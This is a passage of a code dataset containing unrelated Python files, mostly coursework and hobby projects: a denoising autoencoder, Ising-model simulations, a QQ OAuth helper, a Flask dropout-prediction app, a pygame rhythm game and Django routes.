padding='same')\r\n\r\n def r_images(self, x):\r\n return tf.image.resize(x, (32, 
32))\r\n\r\n def encoder(self, x):\r\n c1 = self.c1(self.r_images(x))\r\n c2 = self.c2(c1)\r\n c3 = self.c3(c2)\r\n code_input = self.flatten(c3)\r\n z = self.dense(code_input)\r\n return z\r\n\r\n def decoder(self, z):\r\n decoder_input = tf.reshape(z, (-1, 16, 16, 1))\r\n dc0 = self.dc0(decoder_input)\r\n dc1 = self.dc1(dc0)\r\n dc2 = self.dc2(dc1)\r\n dc3 = self.dc3(dc2)\r\n return dc3\r\n\r\n def call(self, x):\r\n code = self.encoder(x)\r\n xhat = self.decoder(code)\r\n return xhat\r\n\r\n\r\n# Create the model\r\nmodel = DAC()\r\n\r\n# Define the optimizer and the train loss function\r\noptimizer = tf.keras.optimizers.Adam(0.001)\r\ntrain_loss = tf.keras.metrics.Mean(name='train_loss')\r\n\r\n\r\n@tf.function\r\ndef train(noisy_images, images):\r\n with tf.GradientTape() as tape:\r\n reconstructions = model(noisy_images)\r\n loss = tf.keras.losses.MSE(\r\n model.r_images(images), reconstructions)\r\n gradients = tape.gradient(\r\n loss, model.trainable_variables)\r\n optimizer.apply_gradients(\r\n zip(gradients, model.trainable_variables))\r\n train_loss(loss)\r\n\r\n\r\nif __name__ == '__main__':\r\n # Load the dataset\r\n (X_train, _), (_, _) = \\\r\n tf.keras.datasets.fashion_mnist.load_data()\r\n X_train = X_train.astype(np.float32)[0:nb_samples] \\\r\n / 255.0\r\n\r\n width = X_train.shape[1]\r\n height = X_train.shape[2]\r\n\r\n X_train_g = tf.data.Dataset.\\\r\n from_tensor_slices(np.expand_dims(X_train, axis=3)).\\\r\n shuffle(1000).batch(batch_size)\r\n\r\n # Train the model\r\n for e in range(nb_epochs):\r\n for xi in X_train_g:\r\n xn = np.clip(xi +\r\n np.random.normal(\r\n 0.0, 0.2,\r\n size=(batch_size, width, height, 1)),\r\n 0.0, 1.0)\r\n train(xn, xi)\r\n print(\"Epoch {}: Loss: {:.3f}\".\r\n format(e + 1, train_loss.result()))\r\n train_loss.reset_states()\r\n\r\n # Show some examples\r\n Xs = np.reshape(X_train[0:batch_size],\r\n (batch_size, width, height, 1))\r\n Xn = np.clip(Xs +\r\n np.random.normal(\r\n 0.0, 0.2,\r\n size=(batch_size, width, height, 1)),\r\n 0.0, 1.0)\r\n Ys = model(Xs)\r\n Ys = np.squeeze(Ys * 255.0)\r\n\r\n # Show the results\r\n sns.set()\r\n\r\n fig, ax = plt.subplots(2, 10, figsize=(18, 4))\r\n\r\n for i in range(10):\r\n ax[0, i].imshow(np.squeeze(Xs[i]), cmap='gray')\r\n ax[0, i].set_xticks([])\r\n ax[0, i].set_yticks([])\r\n\r\n ax[1, i].imshow(Ys[i + 10], cmap='gray')\r\n ax[1, i].set_xticks([])\r\n ax[1, i].set_yticks([])\r\n\r\n plt.show()\r\n","sub_path":"Chapter12/denoising_dca.py","file_name":"denoising_dca.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188087266","text":"# Utility routines for model calibration/utility scripts\n\nimport errno\nimport shutil\nfrom typing import Optional, Iterable, List, Sequence\nfrom itertools import chain\n\nimport errorutil as eu\n\n\n# Determines the file name that would be used as the backup by the backup()\n# function, without actually backing up the file.\ndef backup_name(fname, itnum):\n return suffix_name(fname, \"_\" + str(itnum) + \"_\")\n\n\n# Creates an iteration-tagged backup of the specified file.\n# The backup has the iteration number, bracketed by underscores,\n# between the base file name and the extension.\ndef backup(fname, itnum):\n shutil.copyfile(fname, backup_name(fname, itnum))\n\n\n# Inserts the specified suffix into the given filename immediately before\n# the dot and extension. 
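If the filename has no dot, the suffix is simply appended\n# (the len(bits) == 1 branch below). 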
For example, suffix_name(\"foo.txt\", \"bar\") returns\n# \"foobar.txt\".\ndef suffix_name(fname, suffix):\n bits = fname.split(\".\")\n if len(bits) == 1:\n return fname + suffix\n else:\n return \".\".join(bits[0:-1]) + suffix + \".\" + bits[-1]\n\n\n# Pluralizes a noun if n is not 1. The plural form is given by plur; if omitted,\n# the plural is the singular with \"s\" appended.\ndef pl(n, sing, plur=None):\n if n == 1:\n return sing\n elif plur is None:\n return sing + \"s\"\n else:\n return plur\n\n\n# \"Inclusive range\" - both start and stop are inclusive, which is more intuitive\n# for some applications.\ndef irange(start, stop):\n return list(range(start, stop + 1))\n\n\n# Returns the index of the specified column name in the specified list of column names.\n# The source parameter is the name of the source that is being read (e.g. a CSV filename)\n# so that helpful error messages can be produced on missing columns.\ndef colindex(source: str, available_cols: Sequence[str], col: str) -> int:\n try:\n return available_cols.index(col)\n except ValueError:\n raise eu.MissingColumn(col, available_cols, source)\n\n\n# Returns the index of the specified column names in the specified list of column names.\n# The source parameter is the name of the source that is being read (e.g. a CSV filename)\n# so that helpful error messages can be produced on missing columns.\ndef colindices(source: str, available_cols: Sequence[str], *cols: str) -> List[int]:\n return [colindex(source, available_cols, col) for col in cols]\n\n\n# Returns the indices of the specified values in the specified list.\n# Useful for finding column positions in a CSV file with headers.\n# Not optimized in any way, so only good for small lists.\ndef indices(alist, *values):\n return [alist.index(value) for value in values]\n\n\n# Returns the elements of the row indicated by the list of column indices.\n# This is designed so you can directly pass in the result of colindices.\ndef elements(row: Sequence[str], cols: Sequence[int]):\n return [row[i] for i in cols]\n\n\n# Converts a string to a bool the way you'd expect, rather than the stupid\n# way that the built-in bool() function does it.\ndef tobool(string):\n lower = string.lower()\n if lower == \"true\":\n return True\n elif lower == \"false\":\n return False\n else:\n raise ValueError(string)\n\n\n# Returns value forced to be between minvalue and maxvalue inclusive.\ndef clip(value, minvalue, maxvalue):\n if value < minvalue:\n value = minvalue\n if value > maxvalue:\n value = maxvalue\n return value\n\n\n# Returns a value from a nested dictionary indexed by the specified keys. Returns\n# the default value if a key is absent at any level.\ndef get_in(a_dict, keys, default):\n cursor = a_dict\n for key in keys:\n if key not in cursor:\n return default\n cursor = cursor[key]\n return cursor\n\n\n# Adds a mapping to a nested dictionary. The keys are used to index into each layer\n# of the dictionary. If a key at any level is absent, it is automatically created.\ndef assoc_in(a_dict, keys, value):\n cursor = a_dict\n for key in keys[:-1]:\n if key not in cursor:\n cursor[key] = {}\n cursor = cursor[key]\n cursor[keys[-1]] = value\n\n\n# Takes a nested dictionary and flips the order of the outermost two nests.\n# For example, if ndict[\"foo\"][\"bar\"] == \"spam\" in the original dictionary,\n# then flipkeys(ndict)[\"bar\"][\"foo\"] == \"spam\". 
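A concrete instance:\n# flipkeys({\"a\": {\"x\": 1}}) == {\"x\": {\"a\": 1}}. 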
The result is always a plain\n# Python dictionary, regardless of the class of the argument.\ndef flipkeys(ndict):\n    result = {}\n    for key1, indict in ndict.items():\n        for key2, value in indict.items():\n            inresult = result.setdefault(key2, {})\n            inresult[key1] = value\n    return result\n\n\n# Combination of zip and iteritems, used for stepping through several parallel\n# dictionaries that have the same keys. Returns an iterable of 2-tuples. The\n# first element is the key. The second is itself a tuple containing the value\n# corresponding to that key in each of the dictionaries. If the key sets are\n# not equal, only the keys that are present in all of the dictionaries are\n# returned. The first dictionary must allow iteration over its keys; the others\n# only need to support item access by key, so any object with a suitable\n# __getitem__ method is allowed.\ndef zipitems(*dicts):\n    for key in dicts[0]:\n        try:\n            yield key, tuple([d[key] for d in dicts])\n        except KeyError:\n            pass\n\n\n# Reverses zip: turns a list of tuples into a tuple of lists\ndef unzip(a_list):\n    return tuple(list(x) for x in zip(*a_list))\n\n\n# Opens a file for writing, as if by open(fname, \"w\"). If the file cannot be\n# opened (because it is locked or it is a directory, for example), then this\n# function will try appending \" (1)\" to the filename. If that also fails, then\n# it will try appending \" (2)\", and so on. Eventually, this function will\n# return a valid file object. This function will immediately raise an IOError\n# if the directory being written to does not exist.\n# Set binary=True to use binary mode (\"wb\") instead of text mode.\ndef smart_open(fname, binary=False):\n    mode = \"wb\" if binary else \"w\"\n    try:\n        return open(fname, mode)\n    except IOError as e:\n        if e.errno != errno.EACCES:\n            raise e\n    i = 1\n    while True:\n        bracname = suffix_name(fname, \" (\" + str(i) + \")\")\n        try:\n            return open(bracname, mode)\n        except IOError as e:  # rebind so we check the current error, not the original one\n            if e.errno != errno.EACCES:\n                raise e\n        i += 1\n\n\n# Returns the best match to the specified value from among the specified options,\n# or None if there are no good matches.\n# The tolerance parameter indicates how closely the value has to match -\n# 0 means anything goes, 1 means exact matches only (up to case differences).\ndef best_match(value: str, options: Iterable[str], tolerance=0.6) -> Optional[str]:\n    if value in options:\n        return value\n    else:\n        import difflib\n        def match(x):\n            return difflib.SequenceMatcher(None, value, x).ratio()\n        suggestion = max(options, key=match)\n        if match(suggestion) > tolerance:\n            return suggestion\n\n\n# An unmodifiable dictionary-like object that maps everything to itself.\n# It \"contains\" all possible elements.\n# Retrieving or iterating over the keys, values, or items is undefined,\n# since an IdDict \"contains\" infinitely many elements in an unspecified order.\n# If a dictionary is passed to the constructor, its mappings will be used\n# where possible, with all other keys still mapped to themselves.\nclass IdDict:\n    # noinspection PyDefaultArgument\n    def __init__(self, mappings={}):\n        self.mappings = dict(mappings)\n\n    def __getitem__(self, key):\n        if key in self.mappings:\n            return self.mappings[key]\n        else:\n            return key\n\n    def __contains__(self, key):\n        return True\n\n\n# Class that automatically interprets a comma-separated list of ranges, like 2-5,8,27-32\nclass RangeList:\n    def __init__(self, arg):\n        def parse_range(r):\n            if len(r) == 0:\n                return []\n            parts = r.split(\"-\")\n            if len(parts) > 2:\n                raise ValueError(\"Invalid 
range: {}\".format(r))\n return range(int(parts[0]), int(parts[-1]) + 1)\n\n self.list = list(dict.fromkeys(chain.from_iterable(map(parse_range, arg.split(\",\")))))\n","sub_path":"PECAS/S28_aa/scriptutil.py","file_name":"scriptutil.py","file_ext":"py","file_size_in_byte":8281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281387947","text":"#!/usr/bin/python3\nfrom peip3 import *\n\ndef get_from(options):\n i = 0\n while i < len(options):\n if options[i] == \"--from\":\n return options[i+1]\n i += 1\n return \"eng\"\n\ndef get_to(options):\n i = 0\n while i < len(options):\n if options[i] == \"--to\":\n return options[i+1]\n i += 1 \n \n return \"fr\" \n \n\ndef build_sentence(liste):\n out = \"\"\n i = 1\n while i < len(liste):\n if liste[i] != \"--from\" and liste[i] != \"--to\": \n out += argv[i]+\" \"\n i += 1\n else:\n i += 2\n\n return out \n\ndef url_builder(string):\n to = get_to(argv)\n ofrom = get_from(argv)\n out = regsub(\" \",\"%20\",string)\n out = \"http://translate.google.com/translate_t?text=\"+out+\"&langpair=\"+ofrom + \"|\" + to\n return out\n\ndef translate(url):\n page = urlopen(url)\n pattern = \"^.*;TRANSLATED_TEXT='([^']*)';.*$\"\n for line in page:\n if regsearch(\"TRANSLATED_TEXT\",line):\n return regsub(pattern,\"\\\\1\",line)\n\ndef main():\n out = translate(url_builder(build_sentence(argv)))\n print(out)\n\nmain()\n","sub_path":"TDInfoISNARDEnzo/td3/trad.py","file_name":"trad.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"239890193","text":"import random\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef ena_nic():\n return random.choice([-1,1])\n\ndef delta_energija(matrika,xpos,ypos,ising):\n a=matrika[ypos][xpos]\n b=matrika[ypos][xpos+1]+matrika[ypos][xpos-1]+matrika[ypos+1][xpos]+matrika[ypos-1][xpos]\n # print((b*a)*ising)\n return -1*(b*a)*ising*(-1)\n\ndef magnetizacija(matrika):\n return sum(map(sum, matrika))/(len(matrika)**2)\n \ndef ising(n,J,temperatura):\n spini=[[ena_nic() for j in range(n+2)] for i in range(n+2)]\n \n sprememba=0\n\n \n while(sprememba<200*n**2):\n x=np.random.randint(1,n)\n y=np.random.randint(1,n)\n \n sprememba_energije=delta_energija(spini,x,y,J)\n \n if sprememba_energije<0:\n # print(spini[y][x])\n spini[y][x]=spini[y][x]*(-1)\n # print('nov',spini[y][x])\n else:\n ksi=np.random.rand()\n if ksi np.random.random():\n state = test_state\n ES = ET\n # else stay as is\n \n energy_values.append(ES)\n step_index_values.append(istep)\n m.append(M(mu, state))\n #row = ''\n #for site in state:\n # if site==1.0:\n # row += 'X'\n # else:\n # # fancy codes for red O's (thanks, J. Nielsen). 
You could also make a scatter plot with matplotlib.\n # row += '\\x1b[31mO\\x1b[0m'\n #print(row)\nplt.plot(step_index_values, energy_values)\nplt.xlabel('time step')\nplt.ylabel('energy')\nplt.title('%d spins: kT = %.1f' % (N, k*T))\nplt.savefig(\"spins.pdf\")\nprint(\"Theoretical M value:\")\nprint(theoretical_M(N,J, k, T, B))\nplt.figure()\nplt.plot(step_index_values, m)\nplt.title(\"Magnetization vs Time for kT = 1\")\nplt.xlabel(\"time_step\")\nplt.ylabel(\"$M = \\mu \\sum_i^N \\overline{s_i}$\")\nplt.savefig(\"m.pdf\")\n","sub_path":"problem_sets/ps4/locals/3/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589025533","text":"# -*- coding: utf-8 -*-\n\n# 라이브러리 불러오기\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# matplotlib 한글 폰트 오류 문제 해결\nfrom matplotlib import font_manager, rc\nfont_path = \"./malgun.ttf\" #폰트파일의 위치\nfont_name = font_manager.FontProperties(fname=font_path).get_name()\nrc('font', family=font_name)\n\n# Excel 데이터를 데이터프레임 변환 \ndf = pd.read_excel('시도별 전출입 인구수.xlsx', fillna=0, header=0)\n\n# 전출지별에서 누락값(NaN)을 앞 데이터로 채움 (엑셀 양식 병합 부분)\ndf = df.fillna(method='ffill')\n\n# 서울에서 다른 지역으로 이동한 데이터만 추출하여 정리\nmask = (df['전출지별'] == '서울특별시') & (df['전입지별'] != '서울특별시') \ndf_seoul = df[mask]\ndf_seoul = df_seoul.drop(['전출지별'], axis=1)\ndf_seoul.rename({'전입지별':'전입지'}, axis=1, inplace=True)\ndf_seoul.set_index('전입지', inplace=True)\n\n# 서울에서 경기도로 이동한 인구 데이터 값만 선택\nsr_one = df_seoul.loc['경기도']\n\n# 스타일 서식 지정\nplt.style.use('ggplot') \n\n# 그래프 객체 생성 (figure에 1개의 서브 플롯을 생성)\nfig = plt.figure(figsize=(20, 5)) \nax = fig.add_subplot(1, 1, 1)\n\n# axe 객체에 plot 함수로 그래프 출력\nax.plot(sr_one, marker='o', markerfacecolor='orange', markersize=10, \n color='olive', linewidth=2, label='서울 -> 경기')\nax.legend(loc='best')\n\n#y축 범위 지정 (최소값, 최대값)\nax.set_ylim(50000, 800000)\n\n# 차트 제목 추가\nax.set_title('서울 -> 경기 인구 이동', size=20)\n\n# 축이름 추가\nax.set_xlabel('기간', size=12)\nax.set_ylabel('이동 인구수', size = 12)\n\n# 축 눈금 라벨 지정 및 75도 회전\nax.set_xticklabels(sr_one.index, rotation=75)\n\n# 축 눈금 라벨 크기\nax.tick_params(axis=\"x\", labelsize=10)\nax.tick_params(axis=\"y\", labelsize=10)\n\nplt.show() # 변경사항 저장하고 그래프 출력","sub_path":"part4/4.9_matplotlib_lines2.py","file_name":"4.9_matplotlib_lines2.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"120409889","text":"import json\nimport urllib, logging\nfrom urllib.request import urlopen\nfrom django.conf import settings\n\nfrom oauth.constants import BIND_USER_ACCESS_TOKEN_EXPIRES\nfrom oauth.OAuthQQAPIError import OAuthQQAPIError\nfrom itsdangerous import BadData, TimedJSONWebSignatureSerializer as TJWSerializer\n\nlogger = logging.getLogger(\"django\")\n\nclass OauthQQ(object):\n \"\"\"QQ辅助工具\"\"\"\n def __init__(self,client_id=None, client_secret=None, redirect_uri=None, state=None):\n \"\"\"\n :param client_id: QQ_CLIENT_ID\n :param client_secret: QQ_CLIENT_SECRET\n :param redirect_uri: QQ_REDIRECT_URI\n :param state: QQ_STATE\n \"\"\"\n self.client_id = client_id if client_id else settings.QQ_CLIENT_ID\n self.client_secret = client_secret if client_secret else settings.QQ_CLIENT_SECRET\n self.redirect_uri = redirect_uri if redirect_uri else settings.QQ_REDIRECT_URI\n self.state = state or settings.QQ_STATE\n # 第1步\n def get_login_url(self):\n '''获取Authorization_Code'''\n # url = 
\"https://graph.qq.com/oauth2.0/authorize?response_type={}&client_id={}\".format(????)\n url = \"https://graph.qq.com/oauth2.0/authorize?\"\n params = {\n \"response_type\": \"code\",\n \"client_id\": self.client_id,\n \"redirect_uri\": self.redirect_uri,\n \"state\":self.state\n\n }\n url += urllib.parse.urlencode(params)\n print('======',url)\n print(self.client_id)\n print(self.redirect_uri)\n print(self.state)\n return url\n\n # 第2步\n def get_access_token(self,code):\n '''通过Authorization_Code获取access_Token'''\n url = \"https://graph.qq.com/oauth2.0/token?\"\n params = {\n \"grant_type\": \"authorization_code\",\n \"client_id\": self.client_id,\n \"client_secret\": self.client_secret,\n \"code\": code,\n \"redirect_uri\": self.redirect_uri\n }\n url += urllib.parse.urlencode(params) #将query字典转换为url路径中的查询字符串\n try:\n resp = urlopen(url)\n '''\n urllib.request.urlopen(url, data=None)\n\n 发送http请求,如果data为None,发送GET请求,如果data不为None,发送POST请求\n\n 返回response响应对象,可以通过read()读取响应体数据,需要注意读取出的响应体数据为bytes类型\n '''\n\n\n resp_str = resp.read().decode()\n print(resp_str)\n\n resp_dict = urllib.parse.parse_qs(resp_str)#将qs查询字符串格式数据转换为python的字典\n\n print(resp_dict)\n print(self.client_id)\n print(self.redirect_uri)\n print(self.state)\n except Exception as e:\n logger.error(\"获取access_token异常 %s\" % e)\n raise OAuthQQAPIError\n else:\n access_token = resp_dict.get(\"access_token\")\n print(access_token)\n\n return access_token[0]\n\n # 第3步\n def get_openid(self,accesss_token):\n '''通过获取access_token获取openid'''\n url = \"https://graph.qq.com/oauth2.0/me?access_token=\" + accesss_token\n try:\n resp_str = urlopen(url).read().decode()\n print(resp_str) # callback( {\"client_id\":\"YOUR_APPID\",\"openid\":\"YOUR_OPENID\"} );\n resp_str = resp_str[10:-4]\n print(resp_str)\n resp_dict = json.loads(resp_str)\n print(resp_dict)\n\n except Exception as e:\n logger.error(\"获取openid异常 %s\" % e)\n raise OAuthQQAPIError\n else:\n openid = resp_dict.get(\"openid\")\n print(openid)\n\n return openid\n\n # 加密openid\n def generate_bing_user_accesss_token(self,openid):\n s = TJWSerializer(settings.SECRET_KEY, BIND_USER_ACCESS_TOKEN_EXPIRES)\n token = s.dumps({\"openid\":openid})\n print(token)\n token = token.decode()\n return token\n #解密openid\n @staticmethod\n def check_bing_user_accesss_token(access_token):\n s = TJWSerializer(settings.SECRET_KEY, BIND_USER_ACCESS_TOKEN_EXPIRES)\n try:\n data = s.loads(access_token)\n print(data)\n except BadData:\n logging.error(' {} 解码超时'.format(access_token))\n return None\n return data[\"openid\"]\n\n\n\n\n\n\n","sub_path":"yxm/yxm/apps/oauth/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"478623309","text":"def replaceDig(x, from1, to):\n result = 0\n multiply = 1\n\n while (x > 0):\n reminder = x % 10\n if (reminder == from1):\n result = result + to * multiply\n\n else:\n result = result + reminder * multiply\n\n multiply *= 10\n x = int(x / 10)\n return result\n\ndef calculateMinMaxSum(x1, x2):\n minSum = replaceDig(x1, 6, 5) + replaceDig(x2, 6, 5)\n maxSum = replaceDig(x1, 5, 6) + replaceDig(x2, 5, 6)\n print(\"Minimum sum =\", minSum)\n print(\"Maximum sum =\", maxSum, end=\" \")\n# Driver code\nif __name__ == '__main__':\n x1 = 45\n x2 = 64\n calculateMinMaxSum(x1, x2)\n x3 = 11\n x4 = 53\n calculateMinMaxSum(x3, 
x4)\n","sub_path":"MinMaxSum.py","file_name":"MinMaxSum.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"167491780","text":"from flask import Flask,render_template,request,url_for\nfrom scipy import stats\n#EDA Packages\nfrom sklearn import preprocessing \nlabel_encoder = preprocessing.LabelEncoder() \nimport pandas as pd\nimport numpy as np\nimport pickle\napp = Flask(__name__)\ncols = ['gender', 'caste', 'mathematics_marks','english_marks', 'science_marks', 'science_teacher','languages_teacher','guardian', 'internet']\nwith open('model1.pkl', 'rb') as file: \n model1 = pickle.load(file)\nwith open('model3.pkl', 'rb') as file: \n model3 = pickle.load(file)\nwith open('model4.pkl', 'rb') as file: \n model4 = pickle.load(file)\nwith open('model5.pkl', 'rb') as file: \n model5 = pickle.load(file)\ndef transf(dat):\n atr=[]\n for x in dat['continue_drop']:\n if x==\"continue\":\n atr.append(0)\n else:\n atr.append(1)\n dat['continue_drop']=atr\n dat['guardian']= label_encoder.fit_transform(dat['guardian'])\n dat['gender']= label_encoder.fit_transform(dat['gender'])\n dat['internet']= label_encoder.fit_transform(dat['internet'])\n dat['caste']= label_encoder.fit_transform(dat['caste'])\n return dat\ndef mode (A,B,C,D):\n tzero = 0\n tone=0\n n= len(A)\n results=[]\n for i in range(0,n):\n one = 0\n zero = 0\n if(A[i]==0):\n zero = zero+1\n if(A[i]==1):\n one = one +1\n if(B[i]==0):\n zero = zero+1\n if(C[i]==0):\n zero = zero+1\n if(B[i]==1):\n one = one +1\n if(C[i]==1):\n one = one +1\n if(D[i]==0):\n zero = zero+1\n if(D[i]==1):\n one = one +1\n if(zero>one):\n results.append(0)\n tzero=tzero+1\n if(one>zero):\n results.append(1)\n tone=tone+1\n if(one == zero):\n if(tzero>tone):\n results.append(0)\n tzero=tzero+1\n else:\n results.append(1)\n tone=tone+1\n return results\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n@app.route(\"/predict\",methods=['POST'])\ndef predict():\n\n if request.method == 'POST':\n int_features = [float(x) for x in request.form.values()]\n final = np.array(int_features)\n data_unseen = pd.DataFrame([final], columns = cols)\n data_unseen['mathematics_marks'] = data_unseen['mathematics_marks']/100\n data_unseen['english_marks'] = data_unseen['english_marks']/100\n data_unseen['science_marks'] = data_unseen['science_marks']/100\n prediction = model1.predict(data_unseen)\n prediction1 = int(prediction[0])\n prediction = model3.predict(data_unseen)\n prediction3 = int(prediction[0])\n prediction = model4.predict(data_unseen)\n prediction4 = int(prediction[0])\n prediction = model5.predict(data_unseen)\n prediction5 = int(prediction[0])\n pred = stats.mode([prediction1,prediction3,prediction4,prediction5])[0][0]\n if pred==0:\n prediction = \"NOT DROP\"\n else:\n prediction = \"DROP\"\n return render_template('index.html',pred='STUDENT WILL {}'.format(prediction))\ndef guess (dataset):\n ids=[]\n A = model1.predict(dataset)\n B = model5.predict(dataset)\n C =model3.predict(dataset)\n D = model4.predict(dataset)\n results = mode(A,B,C,D)\n index = find(results)\n return index\ndef find(A):\n resul = []\n n = len(A)\n for i in range (0,n):\n if A[i]==1:\n resul.append(i)\n return resul\n@app.route(\"/data\",methods=['POST'])\ndef data():\n\tif request.method == 'POST':\n\t\tf = request.form['csvfile']\n\t\twith open(f) as file:\n\t\t\tcsvfile = pd.read_csv(file)\n\t\tdf = transf(csvfile)\n\t\tX = df[['gender', 'caste', 
'mathematics_marks','english_marks', 'science_marks', 'science_teacher','languages_teacher', 'guardian','internet']]\n\t\tadc=guess(X)\n\t\tids =[]\n\t\tfor i in adc:\n\t\t\tids.append(df['student_id'][i])\n\t\tids=pd.DataFrame(ids)\n\t\tids=ids.rename(columns={0: \"Student_ID\"})\n#\t\tout = model1.predict(csvfile)\n\t\treturn render_template('data.html',data =ids.to_html())\nif __name__ == '__main__':\n\tapp.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241312397","text":"\"\"\"\nProject : Olin College Software Design Spring 2017\nBy : Seungin Lyu and Yichen Jiang\nGame Name : Pixel_Dancer\nVersion : 0.2\nDate : April 8th, 2017\n\nMove your doggy around with the arrow keys to paint as many\npictures as possible. Remember, you should follow the music rhythm! If you\naren't following the beat, you will lose your precious energy and end up\nonly coloring half the grid you are on. Also, you don't want to go out of the\npicture and be careful not to eat the toxic chocolates! You will gain some\nextra energy everytime you complete one picture. Good Luck!\n(by the way..the energy decreases naturally because doggy is hungry..)\nYou can play with the game settings by manipulating the defined constants.\n\n\"\"\"\n\nimport pygame\n\nimport game as g\nimport models as m\nimport viewers as v\nimport controllers\nimport config\n\n\ndef main():\n \"\"\"\n This main function contains all the while loops of the game.\n \"\"\"\n # initialize pygame\n pygame.init()\n # Game Settings\n c = config.config()\n pygame.display.set_caption(c.TITLE)\n\n # initialize game instance with impofrted config.py\n\n while (True):\n # initializing models in game instance speficied by config.py\n game = g.game(c)\n game.new_game()\n # initialize game screen\n screen = pygame.display.set_mode(game.canvas_size)\n # initializes viewers :\n viewers = [v.BackgroundViewer(game.bg),\n v.GridListViewer(game.grid_list),\n v.MonsterViewer(game.monster, game.grid_list),\n v.PlayerViewer(game.player, game.grid_list),\n v.EnergyViewer(game.player),\n v.RhythmViewer(game.rhythm)]\n # intializes controller\n controller = controllers.PlayerController(game.player)\n game.start_game()\n while game.running:\n if game.player.has_died:\n game.game_over()\n if game.is_stage_complete():\n game.set_new_stage()\n\n # checks external inputs / runs controllers\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n controller.PlayerKeyController(event,\n game.grid_list,\n game.rhythm)\n # updates models every frame (regardless of keyboard input)\n game.monster.update(game.rhythm)\n game.player.update(game.rhythm, game.monster)\n game.rhythm.update_frame_count(1)\n\n # drawing on screen\n [viewer.draw(screen) for viewer in viewers]\n\n game.clock.tick(c.FPS)\n pygame.display.flip()\n\n # a new screen for gameover screen\n screen = pygame.display.set_mode(game.canvas_size)\n while(game.gameover):\n # initializing models\n font = \"norasi\"\n msg1 = m.Message(font, 80, \"GAME OVER\", (90, 80), c.RED)\n msg2 = m.Message(font, 30, \"PRESS ENTER TO PLAY AGAIN\",\n (90, 480), c.BLUE)\n msg3 = m.Message(font, 50,\n \"Pictures Cleared : \" + str(game.total_num_pic),\n (90, 280), c.WHITE)\n messages = [msg1, msg2, msg3]\n\n viewers = []\n # initializing viewers\n [viewers.append(v.MessageViewer(msg)) for msg in messages]\n\n # drawing on 
screen\n [viewer.draw(screen) for viewer in viewers]\n\n # check external inputs\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n game.new_game()\n\n game.clock.tick(c.FPS)\n pygame.display.flip()\n pygame.quit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"148723858","text":"class Test:\r\n \"This is a sample class\"\r\n name=\"Hello\"\r\n def fun(self):\r\n print(\"Hello\")\r\n @classmethod\r\n def fun2(cls):\r\n print(Test.name)\r\n def fun1(self):\r\n print(\"This is second function\")\r\n\r\nif __name__==\"__main__\":\r\n t=Test()\r\n t.fun()\r\n print(Test.__dict__)\r\n print(Test.__doc__)\r\n Test.fun2()\r\n Test.fun(t)\r\n Test.fun1(t)","sub_path":"classmethd.py","file_name":"classmethd.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"353514437","text":"import numpy as np\n\n\nclass KernalSmooth:\n \n \n def kernal_function(self, x, kernal):\n if kernal == \"gaussian\":\n return 1/(np.sqrt(2*np.pi)) * np.exp(-(np.array(x)**2)/2)\n elif kernal == \"uniform\":\n return 0.5 * (np.abs(x) <= 1)\n elif kernal == \"epanechnikov\":\n return 0.75 * (1-x**2) * (np.abs(x) <= 1)\n elif kernal == \"biquadrate\":\n return (15/16) * (1-x**2)**2 * (np.abs(x) <= 1)\n else :\n print(\"your kernal function is not avaliable\")\n \n \n def fitpredict(self, U, y, x, h, kernal = \"gaussian\"):\n y_hat = []\n for each_x in x:\n w = self.kernal_function((U - each_x)/h, kernal)/h\n w = w / w.sum()\n\n # 如果之预测一个变量\n if len(np.shape(y)) == 1:\n y_hat += [(w * y).sum()]\n\n # 如果需要预测多个变量\n elif len(np.shape(y)) == 2:\n multi_w = w\n for i in range( np.shape(y)[1]-1 ):\n multi_w = np.vstack((multi_w,w))\n multi_w = multi_w.T\n y_hat.append((multi_w * y).sum(axis=0))\n\n return np.array(y_hat)","sub_path":"pycode/nonparam.py","file_name":"nonparam.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648277772","text":"from django.conf import settings\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom django.template.context_processors import static\nfrom django.urls import path, include, re_path\nfrom app01 import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('test/',views.responseTest),\n path('getPaperListByKey',views.getPaperListByKey),\n path('login',views.login),\n path('register',views.register),\n path('getPaperListByKeyword',views.getPaperListByKeyword),\n path('getPaperInfoByID',views.getPaperInfoByID),\n path('judgeRepetitiveUserName',views.judgeRepetitiveUserName),\n path('judgeRepetitiveEmail',views.judgeRepetitiveEmail),\n path('check_mail',views.check_mail),\n 